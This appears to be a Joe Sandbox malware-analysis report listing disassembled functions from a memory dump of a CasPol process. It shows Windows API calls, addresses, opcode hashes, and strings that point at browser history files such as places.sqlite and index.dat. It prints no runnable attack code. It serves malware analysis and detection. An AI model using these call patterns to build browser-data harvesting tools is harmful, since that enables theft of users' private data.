                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                                  • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                                  • API String ID: 0-1445880494
                                                                                                                                                                                                                                  • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                                                                                                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                  • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156039329-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: .Wu
• API String ID: 2081463915-3424199868
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                  • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1297977491-0
                                                                                                                                                                                                                                  • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                  • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
• Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
• Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
• Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
• Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
